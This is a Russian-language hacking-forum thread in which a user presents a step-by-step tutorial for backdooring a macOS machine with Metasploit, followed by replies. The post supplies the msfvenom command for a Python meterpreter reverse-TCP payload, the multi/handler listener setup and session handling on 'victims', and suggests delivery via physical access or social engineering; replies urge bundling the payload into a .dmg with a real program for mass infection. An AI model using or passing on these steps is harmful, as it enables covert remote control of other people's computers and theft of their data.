Статья Meterpeter on OS X

G0p43R

Премиум
27.02.2018
104
83
#1
На самом деле,тема достаточно старая и заезженная тема, но все таки решил поделиться ей с юными хацкерами, вдруг молодое поколение не знает английский :) По сути данная статья является переводом другой, взятой с
Для просмотра контента необходимо: Войти или зарегистрироваться
, с небольшим добавлением информации от меня.

Итак, давайте представим, что у нас есть задача получить временный доступ на таргетированную машину с установленной OS X.
В моих планах было иследование СИ, ну а так же просто спортивный интерес :)

Ни для кого не секрет, что Metasploit является одним из сильнейщих инструментом для создания бекдоров.
Собственно говоря его то мы и будем рассматривать.

Первый этап - установка.
sudo pacman -S metasploit


Второй этап - создание нашего бекдорчика и запуск msf
Для начала нам необходимо создать наш файлик , который нужно будет запустить на таргетированной машине. Для этого в нашей консольки введем следующую команду:
Bash:
msfvenom -p python/meterpreter/reverse_tcp LHOST=*.*.*.* LPORT=**** > backdoor.py
Утилита msfvenom позволяет создать нам payload из обширного "меню"
Для тех кто в танке, payload == полезная нагрузка,руткит, слушатель и тд
Так же мы передаем такие параметры, как LHOST и LPORT.
LHOST является IP машины, куда будет перенапрвляться трафик с машины цели, LPORT - соответсвенно порт.

Теперь самое интересное. Давай-те наконец-то запустим msf.
Bash:
msfconsole
DeepinScreenshot_select-area_20180417132443.png
После запуска - софтинка нас встречает рандомным баннером, что достаточно мило и приятно x)

Третий этап - наконец то получили доступ ^~^

Итак, подготовка нашей рабочей машины:

Bash:
use multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST *.*.*.*
set LPORT ****
exploit -j -z
Уточню, что lhost и lport должны быть такими же,какие мы указали при создании файла

После этого - мы должны увидеть строчку, которая сообщает нам о том, что мы готовы к соединению
DeepinScreenshot_select-area_20180417150816.png

А теперь самое интересное :)

У нас есть на руках файлик, у нас есть цель. И что же делать?
Тут два варианта-либо физический доступ к машине , либо СИ.
Это уже Ваше решение, как загрузить файлик на таргет.

python backdoor.py


После успешного запуска на тагрете, в консоли мы сможем увидеть
DeepinScreenshot_select-area_20180417135144.png
Если у нас несколько "клиентов" попалось и запуск бекдора был осуществлен на нескольких машинах , мы можем посмотреть список всех жертв, благодаря sessions
DeepinScreenshot_select-area_20180417135515.png

Затем- мы выбираем нашу жертву , а точнее выбираем активную сессию sessions -i 3
И все, вуоля!

Мы внутри машины жертвы.
Чтобы убедиться в этом-мы можем использовать getuid
DeepinScreenshot_select-area_20180417135851.png

Для дальнейшего изучения возможностей хацкера в машине жертвы, настоятельно рекомендую изучить методы в команде help

Вывод:
В заключении хотелось бы сказать, жертвой являлся мой коллега, который был осведомлен. Ну а так же не злоупотребляйте хаками и помните, что карма все запоминает ^~^

Всем спасибо за внимание, жду критики )
 

Вложения

Последнее редактирование:

z3r0c10wn

Премиум
04.09.2017
101
183
#2
Думаю что запуск через питон не самый подходящий вариант. ИМХО автору лучше было бы представить вариант сборки с .dmg+реальной программой. Тем более это более грамотный подход с точки зрения заражения пользователя при пентесте. Но это только ИМХО.
 
Симпатии: Понравилось G0p43R

G0p43R

Премиум
27.02.2018
104
83
#3
У меня была такая идея, но что то я решил пойти более простым путем. У меня есть подход и решение через .dmg :)

Но, понимаете, данная статья появилась только из тех соображений, что у меня был физ доступ к машине. Чисто таргтетированный подход, через питон, я полагаю это гораздо проще сделать, когда есть физ доступ.

Когда мы говорим про массовое зарожение, то да, Ваше замечание вполне весомо.

Спасибо :)
 

Djon253

Премиум
15.11.2017
32
13
#4
Во всём этом самое интересное как раз создание полезной нагрузки (и смешивание с реальной программой), а само интересное доставка к цели (СИ). То что написал автор, как раз самое неинтересное. Гугл просто забит этим материалом. Но это мое мнение. Продолжите пожалуйста, и раскройте тему. В жизни у вас 100%не будет доступа к цели)))).